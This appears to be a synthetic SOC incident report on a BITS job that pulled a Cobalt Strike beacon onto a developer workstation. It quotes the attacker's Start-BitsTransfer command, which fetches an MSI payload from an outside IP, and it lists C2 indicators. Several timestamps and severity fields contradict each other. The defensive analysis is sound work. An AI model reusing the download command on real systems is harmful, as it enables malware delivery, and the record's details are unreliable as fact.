CrowdStrike Alert Details
Alert ID: CS-BITS-1197-7842
Alert Time: 2024-02-15 14:15:22 EST
Severity: HIGH (82/100)
Source: CrowdStrike Falcon EDR
Rule: “Suspicious BITS Job Creation”
MITRE ATT&CK: T1197 – BITS Jobs
Alert Details:
Detection: BITS job created for downloading payload from suspicious URL
Host: DEV-WS-112 (Development Department)
User: rpatel (Raj Patel, Developer)
Time: 14:10 EST
BITS Job Details:
– Job Name: “WindowsUpdateJob”
– Job ID: {7842-ABCD-1234-EFGH-5678}
– Created By: powershell.exe (PID: 3451)
– Command: Start-BitsTransfer -Source “http://185.143.221[.]89/update.msi” -Destination “C:\ProgramData\Microsoft\Windows\Caches\update.msi” -Priority High -Asynchronous
File Transfer:
– Source URL: http://185.143.221[.]89/update.msi
– Destination: C:\ProgramData\Microsoft\Windows\Caches\update.msi
– File Size: 3.2 MB
– Status: Completed at 14:12 EST
– BITS Job Completed: Yes
Additional Events:
– 14:13 – update.msi executed via msiexec.exe
– 14:13 – msiexec spawned powershell.exe (suspicious)
– 14:14 – Network connection to 185.143.221[.]89:443
Anomaly Detection:
– BITS jobs rarely used by developers
– Job name mimics Windows Update
– Destination folder is unusual (Caches folder)
– File executed immediately after download
– C2 connection after execution
Threat Intelligence:
– URL matches known malware distribution site
– update.msi contains Cobalt Strike beacon
– BITS used to evade network monitoring
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed suspicious BITS job creation
2. File Analysis
Analyze update.msi
CrowdStrike Sandbox
MSI contains Cobalt Strike beacon; executes PowerShell
3. Process Investigation
Examine msiexec activity
CrowdStrike
msiexec spawned PowerShell connecting to C2
4. Immediate Containment
Isolate host
CrowdStrike
Host quarantined
5. BITS Job Cleanup
Remove BITS job
bitsadmin
BITS job removed; downloaded file deleted
6. User Interview
Contact user
Teams, Phone
User visited compromised site; downloaded “update”
Jira Incident Report
Ticket: SOC-2024-078
Summary: T1197 – BITS Job Used to Download Malicious Payload
Status: RESOLVED
Resolution: MALICIOUS – Download Blocked After Completion
Priority: P2 – MEDIUM
Labels: T1197, bits-jobs, download-cradle, cobalt-strike, crowdstrike
Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Suspicious BITS Job Creation”.
Host: DEV-WS-112 (Development Department, user rpatel).
Time: 2024-02-15 14:15 EST.
Technique: MITRE ATT&CK T1197 – BITS Jobs.
2. Technical Analysis:
Attack Chain:
14:00 – User visits compromised developer forum
14:02 – Forum page runs JavaScript that downloads PowerShell script
14:05 – PowerShell creates BITS job to download update.msi
14:05-14:12 – BITS downloads file in background (evades network monitoring)
14:12 – BITS job completes
14:13 – update.msi executed via msiexec
14:14 – msiexec spawns PowerShell connecting to C2
14:15 – CrowdStrike alerts
BITS Job Details:
Job Name: WindowsUpdateJob (masquerading)
Source: http://185.143.221[.]89/update.msi
Destination: C:\ProgramData\Microsoft\Windows\Caches\update.msi
Priority: High
Transfer Mode: Asynchronous (background)
Malware Analysis:
File: update.msi (SHA256: b2c3d4e5f6…)
Type: MSI package with embedded Cobalt Strike beacon
Behavior: When installed, extracts and executes PowerShell script
C2: 185.143.221[.]89:443
Evasion Technique:
BITS runs as SYSTEM, bypasses user-mode firewalls
Transfers in background, not visible to user
Uses Windows trusted binary (bitsadmin.exe)
3. Investigation Findings:
Timeline:
14:02 – User visits compromised site
14:05 – BITS job created
14:12 – Download completes
14:13 – MSI executes
14:14 – C2 connection
14:15 – Alert triggers
14:16 – Host isolated
Indicators of Compromise (IoCs):
Network:
– Download URL: http://185.143.221[.]89/update.msi
– C2: 185.143.221[.]89:443
BITS:
– Job Name: WindowsUpdateJob
– Job ID: {7842-ABCD-1234-EFGH-5678}
Files:
– C:\ProgramData\Microsoft\Windows\Caches\update.msi (SHA256: b2c3d4e5…)
4. Containment Actions:
Immediate Actions:
Isolated host via CrowdStrike.
Removed BITS job using bitsadmin /cancel.
Deleted update.msi.
Terminated msiexec and PowerShell processes.
Blocked C2 IP at firewall.
Host Remediation:
Full scan (no other malware).
No reimage needed (malware removed).
User Remediation:
User educated on drive-by downloads.
Browser cache cleared.
5. Root Cause Analysis:
Primary Cause: User visited compromised developer forum.
Contributing Factors:
BITS allowed to download from untrusted sources.
No application control blocking unknown MSI files.
User unaware of drive-by risks.
6. Business Impact:
Operational Impact: Developer workstation offline for 2 hours.
Data Exposure: None (C2 blocked after initial connection).
7. Remediation & Prevention:
Completed Actions:
Malware removed.
Host cleaned.
User educated.
IOCs blocked.
Technical Controls Enhanced:
Blocked BITS jobs to/from untrusted domains via GPO.
Enabled logging for all BITS jobs.
Created SIEM alert for BITS jobs with suspicious destination folders.
Deployed browser isolation for developer browsing.
8. Conclusion:
Attackers used BITS jobs to download malware in the background, evading network monitoring. The user visited a compromised developer forum, triggering the download. CrowdStrike detected the BITS job and subsequent execution, enabling rapid containment.
Closure Rationale: Malware removed; host cleaned; BITS monitoring enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-15 15:30 EST